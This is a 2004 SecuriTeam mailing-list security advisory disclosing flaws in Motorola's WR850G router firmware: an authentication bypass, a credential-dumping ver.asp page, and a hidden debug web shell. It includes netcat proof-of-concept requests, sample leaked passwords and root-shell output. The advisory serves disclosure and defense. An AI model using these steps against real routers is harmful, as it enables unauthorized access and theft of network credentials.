[NEWS] Motorola Wireless Router WR850G Authentication Circumvention

From: SecuriTeam (support_at_securiteam.com)
Date: 10/04/04

  • Next message: SecuriTeam: "[REVS] Microsoft PCT Exploit Analysis" 
    To: list@securiteam.com
Date: 4 Oct 2004 13:53:37 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Motorola Wireless Router WR850G Authentication Circumvention
    ------------------------------------------------------------------------

    SUMMARY

    " <http://broadband.motorola.com/consumers/products/wr850g/> Motorola's
    WR850G Wireless Broadband Router, is built with both an 802.11g wireless
    access point and a 4-port Ethernet router. It's wireless. It's wired. It's
    the foundation of a truly customized network and it's full of options."
    The firmware of Motorola's wireless router WR850G features a flaw that
    enables an attacker to log into the routers web interface without knowing
    the username/password combination and gain knowledge of the router's
    username and password after logging in.
    Additionally the firmware contains an easter egg that provides a user with
    a root shell on the router's Linux software. However this root shell can
    only be opened after a successful authentication.

    DETAILS

    Vulnerable Systems:
     * Motorola Wireless Router WR850G, Firmware v4.03

    Authentication Circumvention:
    One limitation of the routers firmware is that only one system at a time
    can be logged into the web interface. However it does not correctly keep
    track of the currently logged in system, making it possible for an
    attacker to log into the web interface without having to know a username
    or a password.

    All an attacker has to do is to periodically poll for a file on the
    router's web server that can only be accessed when logged into the
    router (most likely this is going to be the file /ver.asp; see the second
    described vulnerability). The attacker will get 302 redirect
    messages, as long as nobody is logged in. However as soon as someone
    knowing the password (ie. the real system administrator) logs into the web
    interface from a different system (might either be behind the router, on
    in front of it), not the system administrator is granted access, but the
    attacker.

    Example:
    server:/var/www/htdocs# nc 10.10.69.244 8080
    GET /ver.asp HTTP/1.0

    HTTP/1.0 302 Redirect
    Server: httpd
    Date: Thu, 02 Sep 2004 14:30:15 GMT
    Location: redirect.asp
    Content-Type: text/xml
    Connection: close

    [Administrator (on a different IP) successfully logs in]

    server:/var/www/htdocs# nc 10.10.69.244 8080
    GET /ver.asp HTTP/1.0

    HTTP/1.0 200 Ok
    Server: httpd
    Date: Thu, 02 Sep 2004 14:32:37 GMT
    Cache-Control: no-cache
    Pragma: no-cache
    Expires: 0
    Content-Type: text/html
    Connection: close

    [snip content]

    The administrator trying to log in gets the error message:
    403 Only one login allowed
    The existing client:192.168.107.58

    This at least tells the administrator someone is tempering with his
    system.

    Password Recovery:
    The router's web server contains a page named ver.asp that contains an
    output of every single configuration switch of the router. Among those
    switches are:
     * Web Interface Username and Password
     * WEP Encryption Keys
     * SNMP Community String
     * DDNS password
    And so on...

    The page can only be accessed when logged into the web interface either by
    knowing the username and password, or by using the method described above.

    Exploit:
    server:/var/www/htdocs# nc 80.108.69.244 8080
    GET /ver.asp HTTP/1.0

    HTTP/1.0 200 Ok
    Server: httpd
    Date: Thu, 02 Sep 2004 13:40:09 GMT
    Cache-Control: no-cache
    Pragma: no-cache
    Expires: 0
    Content-Type: text/html
    Connection: close

    [A short excerpt of the output:]
    Pmon Version: 9
    Firmware version: 4.03, April.15, 2004
    pptp_passwd=
    http_username=admin
    wl0_ssid=hugo
    wl0_key1=a3b6d3351f
    http_passwd=strictlysecret
    wl_passphrase=tumbledry
    radius_key=
    SNMPCommunityOne=public

    Easter Egg: Root Shell
    Additionally to the page ver.asp, the routers web server also contains a
    page named frame_debug.asp that contains a web shell where a user can
    execute any command on the routers software. The page can only be accessed
    when logged into the web interface either by knowing the username and
    password, or by using the method described above.

    Example:
    #cat /proc/version
    Linux version 2.4.20 (sparklan@localhost.localdomain) (gcc version 3.0
    20010422 (prerelease) with bcm4710a0 modifications) #37 Thu Apr 15
    16:34:09 CST 2004

    #uptime
    2:56pm up 7:33, load average: 0.59, 0.23, 0.09

    #cat /proc/cpuinfo
    system type : Broadcom BCM947XX
    processor : 0
    cpu model : BCM4710 V0.0
    BogoMIPS : 82.94
    wait instruction : no
    microsecond timers : yes
    tlb_entries : 32
    extra interrupt vector : no
    hardware watchpoint : no
    VCED exceptions : not available
    VCEI exceptions : not available
    dcache hits : 3694025514
    dcache misses : 3395654302
    icache hits : 3303822179
    icache misses : 3094738920
    instructions : 2214575440

    Workarounds:
    Even though this does not resolve the vulnerabilities, the web interface
    should be configured to only listen to the LAN and not the WAN interface.
    This at least eliminates the risk of being hacked from the outside, while
    it is still possible for an insider to gain the passwords in the way
    described above.

    Vendor Status:
    Vendor contacted (09-02-2004 and 09-09-2004). No patch available.

    ADDITIONAL INFORMATION

    The information has been provided by <d.fabian@sec-consult.com> Daniel
    Fabian.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[REVS] Microsoft PCT Exploit Analysis"

    Relevant Pages